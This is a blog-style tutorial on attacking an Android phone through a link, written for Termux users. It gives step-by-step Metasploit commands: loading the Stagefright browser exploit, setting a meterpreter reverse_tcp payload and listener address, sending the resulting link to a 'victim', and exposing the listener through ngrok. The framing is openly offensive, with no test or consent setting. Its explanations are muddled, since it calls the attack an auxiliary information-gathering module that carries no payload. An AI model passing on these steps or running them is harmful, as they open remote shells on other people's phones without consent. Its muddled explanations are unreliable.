Hack android phone using link with Termux

 Hello guy’s, Welcome to another article, In this article we are going to discuss about How to hack android phone with Metasploit using link. This method we are using auxiliary module firs of all we should know what is auxiliary module

What is auxiliary module?

Auxiliary modules are a fascinating feature of the framework allowing it to extend for a variety of purposes other than exploitation. You can create your own quick vulnerability scanners, port scanners, make MSF work as an FTP, HTTP or SMTP client and do a whole lot of other cool stuff 

Lot’s of exploit’s are there in auxiliary module but now we use “browser exploit” This exploit give more details about your victim.
Browser exploit is one of the information gathering exploit it’s not a payload once you create link and sent to victim with this exploit it’s give all information about victim device’s

How to get all information about victim mobile with one link

Step 1:

First of all you open your metasploit in your linux or termux so type this below command in your terminal

msfconsole

Once you type this above command metasploit will open in your terminal.

Step 2:

Now we need to set exploit so type this below command in your metasploit terminal.

 exploit/android/browser/stagefright_mp4_tx3g_64bit

Once you type this above command this will ask load this module “yes or no” so you type “Y” then press enter.

Step 3:

Now we need to set SRVHOST so type this below command in your metasploit terminal in this place you think why we need to give srvhost. the answer is the SRVHOST connect your device and victim device so we should be give srvhost. if you did not give this this exploit did not work.

set SRVHOST ( your local host ip address)

How to get our local ip address First you open new terminal and type ifconfig or sudo ifconfig you will get it.

Step 4:

Now we need to set payload so type this below command in your metasploit terminal. This payload will help you to inject virus in victim device.

set payload linux/armle/meterpreter/reverse_tcp

Step 5:

Now we need to set LHOST and LPORT so type this below command in your metasploit terminal one by one.
set LHOST ( your ip address)
set LPORT ( your port) 

Step 6:

Now we need to set Verbose this will help you to print the information in your metasploit terminal so type this below command in your metasploit terminal.

set verbose true

Step 7:

Now you simply type this below command in your metasploit terminal this will help you to rum this exploit.

exploit

Once you run this above command in your metasploi terminal you will get a link no you share that link into your victim.

Step 8:

Once your victim click your link you will get all information about your victim device

NOTE: Don’t you use your local ip address because that will be work only same wifi connection so you use ngrok

READ: How to iinstall ngrok in termux

Post a Comment

Previous Post Next Post